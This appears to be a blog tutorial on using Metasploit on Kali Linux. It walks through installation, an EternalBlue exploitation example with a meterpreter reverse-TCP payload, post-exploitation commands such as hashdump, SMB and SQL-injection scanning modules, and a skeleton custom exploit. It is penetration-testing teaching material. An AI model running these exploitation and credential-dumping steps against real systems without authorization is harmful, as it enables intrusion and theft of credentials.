Using Metasploit Framework on Kali Linux: A Step-by-Step Guide

The Metasploit Framework is a powerful tool that has become a staple in the arsenal of cybersecurity professionals. Whether you’re a penetration tester, security researcher, or simply interested in learning more about cybersecurity, Metasploit provides a robust platform for discovering, exploiting, and validating vulnerabilities in various systems. When paired with Kali Linux, a penetration testing-focused operating system, the potential for effective security testing becomes even more pronounced.

In this comprehensive guide, we’ll walk you through the basics of Metasploit, how to install it on Kali Linux, and explore its various features with step-by-step examples.

What is Metasploit Framework?

Metasploit is an open-source platform for developing, testing, and executing exploit code. It was initially created by H.D. Moore in 2003 and has since become one of the most widely used tools in cybersecurity. Metasploit includes various modules for exploiting known vulnerabilities, payloads for executing code on target systems, and auxiliary tools for tasks like scanning and fuzzing.

Key Components of Metasploit

1. Exploit: An exploit is a piece of code that takes advantage of a vulnerability in a system. Metasploit has a vast library of exploits that can target different platforms, applications, and network services.
2. Payload: A payload is the code that gets executed on the target system after a successful exploit. Metasploit has several payloads that range from opening a command shell to creating a persistent backdoor.
3. Auxiliary: Auxiliary modules are used for tasks like scanning, fuzzing, and performing brute-force attacks. They don’t exploit a vulnerability but help in the information-gathering process.
4. Post-Exploitation: After exploiting a system, Metasploit provides post-exploitation tools to help maintain access, gather further intelligence, or pivot to other systems in the network.

Installing Metasploit on Kali Linux

Before you begin using Metasploit, make sure you have a copy of Kali Linux installed. Kali Linux typically comes with Metasploit pre-installed, but if it’s not available, you can install it with the following steps:

Update and Upgrade Kali Linux: Open a terminal and update the system repositories to ensure you have the latest package list:

sudo apt update && sudo apt upgrade -y

Install Metasploit Framework: If Metasploit is not already installed, you can install it using the package manager:

sudo apt install metasploit-framework

Verify Installation: Once installed, you can verify it by running the following command:

msfconsole

This command will start the Metasploit Console, the primary interface for interacting with the framework.

Getting Started with Metasploit

After installing Metasploit, it’s time to familiarize yourself with the msfconsole interface. This is the heart of the Metasploit Framework, allowing you to search for exploits, configure them, and launch attacks.

Starting Metasploit

To start Metasploit, open a terminal and type:

msfconsole        

You’ll be greeted with a banner and a prompt that looks like this:

msf6 >        

The msf6 prompt indicates that you’re running Metasploit version 6. From here, you can execute a variety of commands to interact with the framework.

Basic Commands in Metasploit

Here are some essential commands to get you started:

• help: Lists all available commands in Metasploit.
• search: Searches for exploits, auxiliary modules, or payloads. For example, you can search for exploits related to SMB (Server Message Block) with:

search smb

• use: Loads a specific module for use. After finding a module, you can load it by typing use followed by the module path. For example:

use exploit/windows/smb/ms17_010_eternalblue

• show options: Shows all options that you can configure for a selected module.
• set: Sets specific options for the module. For example, you can set the RHOST (remote host) option to specify the target IP address:

set RHOST 192.168.1.10

exploit: Runs the selected module against the configured target.

Step-by-Step Exploitation with Metasploit

To illustrate the capabilities of Metasploit, let’s go through an example of exploiting a vulnerable machine. For this demonstration, we’ll use the MS17–010 vulnerability, famously known as the “EternalBlue” exploit, which affects Windows systems.

Step 1: Finding the Exploit

The first step is to search for the relevant exploit in Metasploit:

search ms17_010        

Metasploit will return a list of exploits related to the MS17–010 vulnerability. In this case, we’re interested in the ms17_010_eternalblue exploit.

Step 2: Loading the Exploit Module

Once we’ve identified the exploit module, we need to load it with the use command:

use exploit/windows/smb/ms17_010_eternalblue        

Step 3: Configuring the Target

After loading the exploit, use the show options command to view the required settings:

show options        

You’ll see several options, including RHOST, which specifies the target IP address. Set this option to the IP of your target system:

set RHOST 192.168.1.20        

Step 4: Setting the Payload

Metasploit requires a payload to execute after the exploit. A common payload is the reverse TCP shell, which gives you a command line interface on the target machine. Set the payload as follows:

set payload windows/x64/meterpreter/reverse_tcp        

Now, set the LHOST (local host) option to your Kali Linux IP address to receive the reverse shell:

set LHOST 192.168.1.15        

Step 5: Running the Exploit

With the exploit and payload configured, you’re ready to launch the attack. Use the exploit command to execute it:

exploit        

If the exploit is successful, you’ll receive a Meterpreter session, granting you control over the target system.

Step 6: Post-Exploitation with Meterpreter

After gaining access, you can use Meterpreter to perform various actions on the target machine. Here are a few useful Meterpreter commands:

• sysinfo: Displays information about the target system.
• getuid: Shows the user ID you’re running under on the target.
• hashdump: Dumps the password hashes from the target (requires elevated privileges).
• screenshot: Takes a screenshot of the target desktop.

To exit the Meterpreter session, type:

exit        

Using Auxiliary Modules for Scanning

Metasploit isn’t just for exploitation; it also includes auxiliary modules that are useful for scanning and reconnaissance. Let’s go through an example of scanning for open SMB ports.

Step 1: Searching for the SMB Scanner

Use the search command to find auxiliary modules for SMB:

search scanner smb        

You’ll see a list of SMB scanning modules. The auxiliary/scanner/smb/smb_version module is useful for identifying the SMB version on a target.

Step 2: Loading the SMB Scanner

Load the module with the use command:

use auxiliary/scanner/smb/smb_version        

Step 3: Setting the Target Range

Set the target range using the RHOSTS option. This can be a single IP or a range:

set RHOSTS 192.168.1.0/24        

Step 4: Running the Scan

Execute the module with the run command:

run        

Metasploit will scan the specified IP range, returning information about any SMB services it finds. You can use this information to further assess potential vulnerabilities.

Exploiting Web Applications with Metasploit

Metasploit also supports web application exploitation, with modules for testing various vulnerabilities like SQL injection and file inclusion. Here’s an example of using a SQL injection module:

Step 1: Searching for SQL Injection Modules

Search for SQL injection modules with the following command:

search sql_injection        

Step 2: Selecting and Using a Module

Choose an appropriate module for the web application you’re testing. For example:

use auxiliary/scanner/http/sqli        

Step 3: Setting Target Options

As before, set the RHOSTS option to specify the target web server

set RHOSTS 192.168.1.25        

Configure any other required options specific to the module and run the scan.

Creating Custom Exploits in Metasploit

Metasploit allows you to create custom exploits, which can be useful if you’ve discovered a new vulnerability or need to customize an existing exploit for specific conditions. Here’s a simple example of creating a custom exploit.

1. Open a Text Editor: Open a text editor and create a Ruby file for your exploit. You can name it custom_exploit.rb.
2. Add Basic Exploit Structure: Metasploit exploits are written in Ruby. Start with the basic structure:

require 'msf/core' class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Custom Exploit', 'Description' => 'This is a custom exploit', 'License' => MSF_LICENSE, 'Author' => 'Your Name', 'Payload' => { 'Space' => 1024 }, 'Platform' => 'win', 'Targets' => [ ['Windows XP', { 'Ret' => 0x41414141 }] ], 'DisclosureDate' => 'Oct 14 2024' )) end def exploit # Exploit code here end end

Add Your Exploit Code: Fill in the exploit method with your custom code. Save the file and load it into Metasploit with:

• loadpath /path/to/your/custom_exploit

Conclusion

The Metasploit Framework on Kali Linux is a versatile and powerful tool for penetration testing and vulnerability assessments. Whether you’re scanning for open ports, testing for SQL injection, or creating custom exploits, Metasploit provides a wide range of capabilities for both novice and advanced users.

This guide covered the basics, but Metasploit’s true power lies in its flexibility and community support. With regular updates, new modules, and an active user base, Metasploit continues to be a critical tool in the cybersecurity landscape. As you explore and practice, always remember to operate within the legal boundaries and obtain permission before testing any system.

Promote and Collaborate on Cybersecurity Insights

We are excited to offer promotional opportunities and guest post collaborations on our blog and website, focusing on all aspects of cybersecurity. Whether you’re an expert with valuable insights to share or a business looking to reach a wider audience, our platform provides the perfect space to showcase your knowledge and services. Let’s work together to enhance our community’s understanding of cybersecurity!

About the Author:

Vijay Gupta is a cybersecurity enthusiast with several years of experience in cyber security, cyber crime forensics investigation , and security awareness training in schools and colleges. With a passion for safeguarding digital environments and educating others about cybersecurity best practices, Vijay has dedicated his career to promoting cyber safety and resilience. Stay connected with Vijay Gupta on various social media platforms and professional networks to access valuable insights and stay updated on the latest cybersecurity trends.